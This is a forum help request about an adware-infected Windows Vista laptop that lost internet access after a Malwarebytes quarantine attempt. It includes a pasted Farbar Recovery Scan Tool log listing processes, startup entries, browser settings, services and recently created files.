Jump to content

No internet access after MB scan of terribly infected PC


Recommended Posts

A elderly family member's PC was miserably slow, showing obvious signs of infection, programs such as ArcadeTwist, PremierOpinion, Slimware/Slimcleaner, OneSystemCare, among others.

 

I downloaded, installed, and did a threatscan with the free version of malwarebytes. It found over 2300 items, i attempted to quarantine them all, then something odd happened. Malwarebytes said "0 items successfully quarantined" and the finish button froze. So i restarted the pc, and now it shows all the the items (i assume, i didnt count) in the quarantine, however the scan log from that scan shows nothing, zeros in every catagory.

 

Now after that reboot, the PC cannot access the internet, despite showing a network connection, webpages cannot be accessed, neither thru Firefox or IE, MalwareBytes cant access servers to update, trying to "ping" google.com in command prompt doesnt work.

 

needless to say, i cant download any other scan tools.

 

All help is appreciated, thank you.

Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016
Ran by Barbara (administrator) on BARBARA-PC (26-01-2016 03:06:09)
Running from C:\Users\Barbara\Desktop
Loaded Profiles: Barbara (Available Profiles: Barbara)
Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Agere Systems) C:\Windows\System32\agr64svc.exe
(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe
(CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
(Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor)
HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation)
HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [LXCYCATS] => "rundll32" \3\LXCYtime.dll,RunDLLEntry
HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA)
HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink)
HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA)
HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 0.0.0.1    mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C}
SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL =
SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKU\.DEFAULT -> {9F6F6BFF-5270-44E3-8D40-0F2D89A64F42} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=WBR&o=13993&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=^W5&apn_dtid=^YYYYYY^YY^US&apn_uid=1C0E9576-C62B-4A47-ABAA-A8CAF89B7691&apn_sauid=BC87ED7E-5FF1-4904-A76C-FAE6DCFDD564
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -  No File
Toolbar: HKU\.DEFAULT -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File

FireFox:
========
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Default
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.)
FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA)
R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed]
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [1414128 2015-05-18] (Coupons.com Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( )
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed]
R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation)
R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed]
R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. )

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2016-01-23] ()
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-26 03:06 - 2016-01-26 03:06 - 00019243 _____ C:\Users\Barbara\Desktop\FRST.txt
2016-01-26 03:04 - 2016-01-26 03:06 - 00000000 ____D C:\FRST
2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe
2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt
2016-01-23 17:05 - 2016-01-24 02:52 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo
2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\WebBar
2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files\WebBar
2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm
2016-01-23 16:18 - 2016-01-23 18:06 - 00000000 ____D C:\ProgramData\CrimeWatch
2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll
2016-01-23 16:12 - 2014-08-18 15:51 - 00660792 ____N C:\Windows\SysWOW64\pmls.dll
2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin
2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D}
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1
2016-01-23 16:10 - 2016-01-26 03:06 - 00000270 _____ C:\Windows\Tasks\PubMach138.job
2016-01-23 16:10 - 2016-01-23 23:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job
2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519
2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer
2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806
2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6
2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138
2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-17 12:03 - 2015-12-08 11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL
